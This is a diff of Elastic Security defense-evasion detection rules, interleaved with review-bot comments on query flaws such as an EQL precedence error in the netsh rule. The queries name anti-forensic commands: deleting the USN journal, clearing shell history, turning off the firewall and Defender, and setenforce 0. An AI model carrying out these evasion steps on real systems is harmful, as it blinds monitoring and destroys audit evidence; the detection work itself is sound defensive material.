diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json index 5cc8aa2dcf109..ce1f469dceb73 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_delete_volume_usn_journal_with_fsutil.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Delete Volume USN Journal with Fsutil", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and \n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"deletejournal\" and process.args : \"usn\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "f675872f-6d85-40a3-b502-c0d2ef101e92", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json index 9ae0b9f5ec2a2..5fe1cbafbe3e0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deleting_websvr_access_logs.json 
@@ -13,10 +13,23 @@ "language": "eql", "license": "Elastic License v2", "name": "WebServer Access Logs Deleted", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\", \n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\", \n \"/var/log/httpd/access_log\", \n \"/var/www/*/logs/access.log\")\n", + "note": "", + "query": "file where event.type == \"deletion\" and\n file.path : (\"C:\\\\inetpub\\\\logs\\\\LogFiles\\\\*.log\",\n \"/var/log/apache*/access.log\",\n \"/etc/httpd/logs/access_log\",\n \"/var/log/httpd/access_log\",\n \"/var/www/*/logs/access.log\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "665e7a4f-c58e-4fc6-bc83-87a7572670ac", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +59,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json index 7564c5adbae05..9d951af198ab1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_deletion_of_bash_command_line_history.json 
@@ -11,10 +11,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Tampering of Bash Command-Line History", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (\n ((process.args : (\"rm\", \"echo\") or\n (process.args : \"ln\" and process.args : \"-sf\" and process.args : \"/dev/null\") or\n (process.args : \"truncate\" and process.args : \"-s0\"))\n and process.args : (\".bash_history\", \"/root/.bash_history\", \"/home/*/.bash_history\",\"/Users/.bash_history\", \"/Users/*/.bash_history\",\n \".zsh_history\", \"/root/.zsh_history\", \"/home/*/.zsh_history\", \"/Users/.zsh_history\", \"/Users/*/.zsh_history\")) or\n (process.name : \"history\" and process.args : \"-c\") or\n (process.args : \"export\" and process.args : (\"HISTFILE=/dev/null\", \"HISTFILESIZE=0\")) or\n (process.args : \"unset\" and process.args : \"HISTFILE\") or\n (process.args : \"set\" and process.args : \"history\" and process.args : \"+o\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7bcbb3ac-e533-41ad-a612-d6c3bf666aba", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json index 32f71856adf56..8f52b98e15cc8 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_posh_scriptblocklogging.json 
@@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "PowerShell Script Block Logging Disabled", - "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it\nprocesses, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type == \"change\" and\n registry.path : \n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n and registry.data.strings : (\"0\", \"0x00000000\")\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making\nit available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it\nprocesses, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### 
Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type == \"change\" and\n registry.path :\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "818e23e6-2094-4f0e-8c01-22d30f3506c6", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
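Review bot: The new `setup` value in this hunk carries a duplicated word, `Steps to implement the logging policy with with Advanced Audit Configuration:`; it should read `Steps to implement the logging policy with Advanced Audit Configuration:`. The same phrase was present in the removed `note` line, so the commit moved the typo rather than introduced it, but `setup` is now the user-facing guidance for enabling the policy this rule depends on. These prepackaged rule files look like they are synced from an upstream rule source, so the wording fix probably needs to land there as well or it will be overwritten on the next sync.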
@@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json index cc84001428ff0..22edd7cf26cde 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_selinux_attempt.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Potential Disabling of SELinux", "query": "event.category:process and event.type:(start or process_started) and process.name:setenforce and process.args:0\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", "severity": "medium", @@ -48,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json index 6cb54ed9c048c..ad91233e10fec 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json 
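Review bot: The `query` context line of the SELinux hunk keys only on `process.args:0`, but `setenforce` also accepts the word `Permissive` as an equivalent way to leave enforcing mode, so the rule has a coverage gap that the new `required_fields` block does not change. With `process.args` declared as `keyword` in that block the match is exact, so `process.args:(0 or Permissive)` closes the gap and any case variant worth covering has to be listed explicitly. Since this commit already bumps `version` to 8, folding the broader match into the same release would spare a second bump.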
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disable_windows_firewall_rules_with_netsh.json 
@@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Disable Windows Firewall Rules via Netsh", - "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a\ndevice, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Disable Windows Firewall Rules via Netsh\n\nThe Windows Defender Firewall is a native component which provides host-based, two-way network traffic filtering for a\ndevice, and blocks unauthorized network traffic flowing into or out of the local device.\n\nAttackers can disable the Windows firewall or its rules to enable lateral movement and command and control activity.\n\nThis rule identifies patterns related to disabling the Windows firewall or its rules using the `netsh.exe` utility.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user is an administrator and is legitimately performing\ntroubleshooting.\n- In case of an allowed benign true positive (B-TP), assess adding rules to allow needed traffic and re-enable the firewall.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"netsh.exe\" and\n (process.args : \"disable\" and process.args : \"firewall\" and process.args : \"set\") or\n (process.args : \"advfirewall\" and process.args : \"off\" and process.args : \"state\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "4b438734-3793-4fda-bd42-ceeada0be8f9", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for 
this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json index 588e4246a7886..1ac7233e48247 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_defender_powershell.json 
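Review bot: The `query` context line of the netsh hunk has an operator-precedence defect the commit leaves in place: EQL's `and` binds tighter than `or`, so the `advfirewall`/`off`/`state` branch is evaluated without the `event.type` and `process.name : "netsh.exe"` constraints, and any process whose arguments contain those three strings fires the rule. Grouping the two argument branches restores the intended gating: `process.name : "netsh.exe" and ((process.args : "disable" and process.args : "firewall" and process.args : "set") or (process.args : "advfirewall" and process.args : "off" and process.args : "state"))`. The `DNS-over-HTTPS Enabled via Registry` hunk has the same shape — its Chrome and Firefox branches are not gated by `event.type in ("creation", "change")` — and would take the same parenthesization. Since `version` is bumped here anyway, fixing the query in the same release avoids another bump for users who track rule updates by version.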
@@ -15,13 +15,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Disabling Windows Defender Security Settings via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. Based on that, examine exceptions, antivirus state,\nsample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Disabling Windows Defender Security Settings via PowerShell\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the execution of commands that can tamper the Windows Defender antivirus features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which action was executed. 
Based on that, examine exceptions, antivirus state,\nsample submission, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Based on the command line, take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name in (\"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\")) and\n process.args : \"Set-MpPreference\" and process.args : (\"-Disable*\", \"Disabled\", \"NeverSend\", \"-Exclusion*\")\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2019-ps" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c8cccb06-faf2-4cd5-886e-2c9636cfcb87", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
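Review bot: The `process.pe.original_file_name in ("powershell.exe", "pwsh.dll", "powershell_ise.exe")` clause in the `query` context line is a case-sensitive comparison (EQL `in`, like `==`, does not fold case, whereas `:` does), so it only adds coverage when the PE header value is exactly lower-case; if the header of the Windows PowerShell binary is `PowerShell.EXE`, as I believe it is, this fallback never fires for a renamed binary and detection rests on `process.name` alone. The case-insensitive form already used on the same line, `process.pe.original_file_name : ("powershell.exe", "pwsh.dll", "powershell_ise.exe")`, closes that gap without changing anything else. The `Disable Windows Event and Security Logs Using Built-in Tools` hunk has the same `in (...)` comparison on `process.pe.original_file_name` for its PowerShell branch and would take the same change.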
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json
index 74d28465bf9d8..98aaff809825f 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_disabling_windows_logs.json
@@ -14,14 +14,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Disable Windows Event and Security Logs Using Built-in Tools", - "note": "## Triage and analysis\n\n### Investigating Disable Windows Event and Security Logs Using Built-in Tools\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the usage of different utilities to disable the EventLog service or specific event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Re-enable affected logging components, services, and security monitoring.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
